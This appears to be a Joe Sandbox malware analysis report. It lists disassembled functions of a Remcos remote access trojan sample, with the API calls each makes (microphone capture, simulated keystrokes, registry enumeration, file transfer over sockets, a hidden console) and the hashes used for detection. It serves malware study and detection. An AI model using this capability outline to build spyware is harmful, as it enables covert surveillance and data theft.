                                                                                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                        • waveInStart.WINMM ref: 00401CFE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                        • String ID: dMG$|MG$PG
                                                                                        • API String ID: 1356121797-532278878
                                                                                        • Opcode ID: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                                                                        • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                                                        • Opcode Fuzzy Hash: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                                                                        • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                                                          • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                                          • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                                          • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                                                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                                                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                                                        • TranslateMessage.USER32(?), ref: 0041D4E9
                                                                                        • DispatchMessageA.USER32(?), ref: 0041D4F3
                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                        • String ID: Remcos
                                                                                        • API String ID: 1970332568-165870891
                                                                                        • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                        • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                                                        • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                        • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                                                                        • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                                                        • Opcode Fuzzy Hash: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                                                                        • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                        • _memcmp.LIBVCRUNTIME ref: 00445423
                                                                                        • _free.LIBCMT ref: 00445494
                                                                                        • _free.LIBCMT ref: 004454AD
                                                                                        • _free.LIBCMT ref: 004454DF
                                                                                        • _free.LIBCMT ref: 004454E8
                                                                                        • _free.LIBCMT ref: 004454F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                        • String ID: C
                                                                                        • API String ID: 1679612858-1037565863
                                                                                        • Opcode ID: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                                                                        • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                                                        • Opcode Fuzzy Hash: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                                                                        • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tcp$udp
                                                                                        • API String ID: 0-3725065008
                                                                                        • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                                        • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                                                        • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                                        • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00411CFE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                                                        • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                                                                        • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                                                                                          • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                                                                                        • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                                                                                          • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                                                                          • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                        • String ID: t^F
                                                                                        • API String ID: 3950776272-389975521
                                                                                        • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                                                                        • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                                                        • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                                                                        • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                        • ExitThread.KERNEL32 ref: 004018F6
                                                                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                        • String ID: PkG$XMG$NG$NG
                                                                                        • API String ID: 1649129571-3151166067
                                                                                        • Opcode ID: a9a7ce0a0b90b44db80bc4e59ffcd89cd879969cdb5479c222021ee2e07a9105
                                                                                        • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                                                        • Opcode Fuzzy Hash: a9a7ce0a0b90b44db80bc4e59ffcd89cd879969cdb5479c222021ee2e07a9105
                                                                                        • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                                                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                                                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                                                          • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                          • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000), ref: 00404BC3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                        • String ID: .part
                                                                                        • API String ID: 1303771098-3499674018
                                                                                        • Opcode ID: e279c082a0d0910cbf5de12e36227e1aa9d15681696cbfcdd7b3720dc44f8cc2
                                                                                        • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                                                        • Opcode Fuzzy Hash: e279c082a0d0910cbf5de12e36227e1aa9d15681696cbfcdd7b3720dc44f8cc2
                                                                                        • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041CD9B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                                                        • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Console$Window$AllocOutputShow
                                                                                        • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                                                                        • API String ID: 4067487056-3065609815
                                                                                        • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                                        • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                                                        • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                                        • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InputSend
                                                                                        • String ID:
                                                                                        • API String ID: 3431551938-0
                                                                                        • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                                        • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                                                        • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                                        • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __freea$__alloca_probe_16_free
                                                                                        • String ID: a/p$am/pm$zD
                                                                                        • API String ID: 2936374016-2723203690
                                                                                        • Opcode ID: e0ecee58873bfc0077d13325f43c3460f208f04ecf7db505f3535ec2a758da20
                                                                                        • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                                                        • Opcode Fuzzy Hash: e0ecee58873bfc0077d13325f43c3460f208f04ecf7db505f3535ec2a758da20
                                                                                        • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Enum$InfoQueryValue
                                                                                        • String ID: [regsplt]$xUG$TG
                                                                                        • API String ID: 3554306468-1165877943
                                                                                        • Opcode ID: 93e1897ebdc99b88186db92230c2e95498abfdd16b02543cd39a55fa0a109888
                                                                                        • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                                                        • Opcode Fuzzy Hash: 93e1897ebdc99b88186db92230c2e95498abfdd16b02543cd39a55fa0a109888
                                                                                        • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID: D[E$D[E
                                                                                        • API String ID: 269201875-3695742444
                                                                                        • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                                        • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                                                        • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                                        • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                                                                          • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                                          • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                                                        • String ID: xUG$NG$NG$TG
                                                                                        • API String ID: 3114080316-2811732169
                                                                                        • Opcode ID: f05c03517f952f3a355b8cbbd5c3f5256b4ab212a1f163f9846f57004d6dde5d
                                                                                        • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                                                        • Opcode Fuzzy Hash: f05c03517f952f3a355b8cbbd5c3f5256b4ab212a1f163f9846f57004d6dde5d
                                                                                        • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0045112C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                                                                        • __alloca_probe_16.LIBCMT ref: 004511B1
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                                                                        • __freea.LIBCMT ref: 0045121D
                                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 313313983-263838557
                                                                                        • Opcode ID: 91877320caf02f46ead72dc2d27e097aa9d58b2df1b48cbe6668f1112c1efda2
                                                                                        • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                                                        • Opcode Fuzzy Hash: 91877320caf02f46ead72dc2d27e097aa9d58b2df1b48cbe6668f1112c1efda2
                                                                                        • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                                                                          • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                                                          • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
